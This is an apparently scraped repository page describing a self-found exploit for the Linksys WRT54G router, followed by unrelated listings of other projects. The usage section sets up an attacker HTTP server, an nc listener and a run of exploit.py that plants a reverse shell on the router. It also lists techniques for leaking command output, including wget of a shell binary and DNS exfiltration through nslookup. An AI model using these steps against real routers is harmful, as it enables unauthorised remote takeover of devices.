Exploiting Linksys WRT54G using a vulnerability I found.

Related tags

Miscellaneousrouterfirmwareopenwrtreverse-engineeringexploitation
Overview

Exploiting Linksys WRT54G

Exploit

# Install the requirements.
pip install -r requirements.txt


ROUTER_HOST=192.169.1.1
ROUTER_USERNAME=admin
ROUTER_PASSWORD=admin

ATTACKER_HOST=192.169.1.100
ATTACKER_HTTP_SERVER_PORT=8000
ATTACKER_REVSHELL_HANDLER_PORT=4141


# Start HTTP server in order to serve the reverse shell executable.
cd revshell
python -m SimpleHTTPServer $ATTACKER_HTTP_SERVER_PORT

# Start reverse shell handler.
nc -l $ATTACKER_REVSHELL_HANDLER_PORT

# Run the exploit.
python exploit.py --host $ROUTER_HOST --username $ROUTER_USERNAME --password $ROUTER_PASSWORD --attacker-host $ATTACKER_HOST --attacker-http-port $ATTACKER_HTTP_SERVER_PORT --attacker-handler-port $ATTACKER_REVSHELL_HANDLER_PORT

Leads for leaking command output

  • Look for file paths that are displayed within the web interface that command output can be written to.
    Using /tmp/ping.log to view the output at /Ping.asp.
  • Use wget to download reverse shell binary to the router.
  • Config the attacker as the DNS server and force the router to issue DNS requests with the command output.
    Like nslookup `whoami`.fake.domain

TODOs

  • Use argparse and make the exploit an executable.

Unsolved Mysteries

  • If ui_language is stored in nvram (Non-Volatile Memory), how come it fixes itself upon reboot?

Links

Firmware
Toolchain

Owner
Elon Gliksberg
I like working on interesting problems.
Elon Gliksberg
GitHub Repository https://elongl.github.io/exploitation/2021/05/30/pwning-home-router.html
[x]it! support for working with todo and check list files in Sublime Text

[x]it! for Sublime Text This Sublime Package provides syntax-highlighting, shortcuts, and auto-completions for [x]it! files. Features Syntax highlight

Jan Heuermann 18 Sep 19, 2022
Implent of Oracle Base line and Lea-3 Baseline

Oracle-Baseline Implent of Oracle Base line and Lea-3 Baseline Oracle Oracle : This model is used to obtain an oracle with a greedy algorithm similar

Andrew Zeng 2 Nov 12, 2021
pyToledo is a Python library to interact with the common virtual learning environment for the Association KU Leuven (Toledo).

pyToledo pyToledo is a Python library to interact with the common virtual learning environment for the Association KU Leuven a.k.a Toledo. Motivation

Daan Vervacke 5 Jan 03, 2022
Visualize Data From Stray Scanner https://keke.dev/blog/2021/03/10/Stray-Scanner.html

StrayVisualizer A set of scripts to work with data collected using Stray Scanner. Usage Installing Dependencies Install dependencies with pip -r requi

Kenneth Blomqvist 45 Dec 30, 2022
Python Control Systems Library

The Python Control Systems Library is a Python module that implements basic operations for analysis and design of feedback control systems.

Control Systems Library for Python 1.3k Jan 06, 2023
Blender addon that enables exporting of xmodels from blender. Great for custom asset creation for cod games

Birdman's XModel Tools For Blender Greetings everyone in the custom cod community. This blender addon should finally enable exporting of custom assets

wast 2 Jul 02, 2022
A tool to help calculate how to split conveyors in Satisfactory into specific ratios.

Satisfactory Splitter Calculator A tool to help calculate how to split conveyors in Satisfactory into specific ratios. Dependencies Python 3.9 PyYAML

RobotiCat 5 Dec 22, 2022
Este projeto se trata de uma análise de campanhas de marketing de uma empresa que vende acessórios para veículos.

Marketing Campaigns Este projeto se trata de uma análise de campanhas de marketing de uma empresa que vende acessórios para veículos. 1. Problema A em

Bibiana Prevedello 1 Jan 12, 2022
Adansons Base is a data management tool that organizes metadata of unstructured data and creates and organizes datasets.

Adansons Base is a data management tool that organizes metadata of unstructured data and creates and organizes datasets. It makes dataset creation more effective and helps find essential insights fro

Adansons Inc 27 Oct 22, 2022
Pixelarticons - Pixel Art Icons made simple for Flutter, powered by pixelarticons and fontify

Pixelarticons - Pixel Art Icons made simple for Flutter, powered by pixelarticons and fontify

lask 16 Dec 12, 2022
A python script to search for k-uniform Euclidean tilings.

k-uniform-solver A python script to search for k-uniform Euclidean tilings. This project's aim is to replicate and extend the list of k-uniform Euclid

3 Dec 06, 2022
Simple script with AminoLab to send ghost messages

Simple script with AminoLab to send ghost messages

Moleey 1 Nov 22, 2021
Un script en python qui permet d'automatique bumpée (disboard.org) tout les 2h

auto-bumper Un script en python qui permet d'automatique bumpée (disboard.org) tout les 2h Pour la première utilisation, 1.Lancer Install.bat 2.(faire

!! 1 Jan 09, 2022
A python script to run any executable and pass test cases to it's stdin and compare stdout with correct output.

quera_testcase_checker A python script to run any executable and pass test cases to it's stdin and compare stdout with correct output. proper way to u

k3y1 1 Nov 15, 2021
NES development tool made with Python and Lua

NES Builder NES development and romhacking tool made with Python and Lua Current Stage: Alpha Features Open source "Build" project, which exports vari

10 Aug 19, 2022
A Modern Fetch Tool for Linux!

Ufetch A Modern Fetch Tool for Linux! Programming Language: Python IDE: Visual Studio Code Developed by Avishek Dutta If you get any kind of problem,

Avishek Dutta 7 Dec 12, 2021
"Hacking" the (Telekom) Zyxel GPON SFP module (PMG3000-D20B)

"Hacking" the (Telekom) Zyxel GPON SFP module (PMG3000-D20B) The SFP can be sour

Matthias Riegler 52 Jan 03, 2023
Repo contains Python Code Reference to learn Python in a week, It also contains Machine Learning Algorithms and some examples for Practice, Also contains MySql, Tableau etc

DataScience_ML_and_Python Repo contains Python Code Reference to learn Python in a week, It also contains Machine Learning Algorithms and some example

Meerabo D Shah 1 Jan 17, 2022
nbsafety adds a layer of protection to computational notebooks by solving the stale dependency problem when executing cells out-of-order

nbsafety adds a layer of protection to computational notebooks by solving the stale dependency problem when executing cells out-of-order

150 Jan 07, 2023
A simple but flexible plugin system for Python.

PluginBase PluginBase is a module for Python that enables the development of flexible plugin systems in Python. Step 1: from pluginbase import PluginB

Armin Ronacher 1k Dec 16, 2022